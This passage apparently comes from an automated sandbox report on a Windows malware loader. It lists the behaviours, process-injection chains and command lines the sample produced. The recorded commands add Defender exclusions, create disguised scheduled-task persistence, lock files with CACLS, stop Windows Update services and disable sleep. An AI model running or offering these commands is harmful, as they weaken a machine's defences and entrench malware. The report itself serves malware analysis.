Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\sc.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\netsh.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\schtasks.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\oneetx.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2284 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\oneetx.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 2284 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\oneetx.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 2284 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\oneetx.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 4080 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 4080 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 4080 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 4080 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 4080 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 4080 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 3948 wrote to memory of 4432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3948 wrote to memory of 4432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3948 wrote to memory of 4432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3948 wrote to memory of 1108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3948 wrote to memory of 1108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3948 wrote to memory of 1108 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3948 wrote to memory of 4888 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3948 wrote to memory of 4888 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3948 wrote to memory of 4888 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3948 wrote to memory of 3232 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3948 wrote to memory of 3232 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3948 wrote to memory of 3232 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3948 wrote to memory of 1920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3948 wrote to memory of 1920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3948 wrote to memory of 1920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3948 wrote to memory of 4280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3948 wrote to memory of 4280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3948 wrote to memory of 4280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4080 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe
PID 4080 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe
PID 4080 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe
PID 4080 wrote to memory of 3748 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 4080 wrote to memory of 3748 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 4080 wrote to memory of 3748 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 4080 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
PID 4080 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
PID 4080 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
PID 4080 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
PID 4080 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
PID 4080 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 4080 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 4080 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 1020 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
PID 1020 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
PID 1020 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
PID 1020 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
PID 1020 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
PID 1020 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe
PID 4080 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
PID 4080 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
PID 4080 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe
PID 4080 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe
PID 4080 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe
PID 4080 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 4080 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 4080 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe
PID 4080 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
PID 4080 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
PID 2940 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2940 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2940 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2940 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2940 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2940 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2940 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\oneetx.exe"

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe

"C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe"

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 2772 -ip 2772

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 620

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"

C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2772 -ip 2772

C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 880

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"

C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe

"C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 2772 -ip 2772

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 888

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 2772 -ip 2772

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 972

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2772 -ip 2772

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 980

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2772 -ip 2772

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 1112

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2772 -ip 2772

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 1140

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2772 -ip 2772

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 1456

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "setup.exe" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2772 -ip 2772

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 1408

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe

"C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

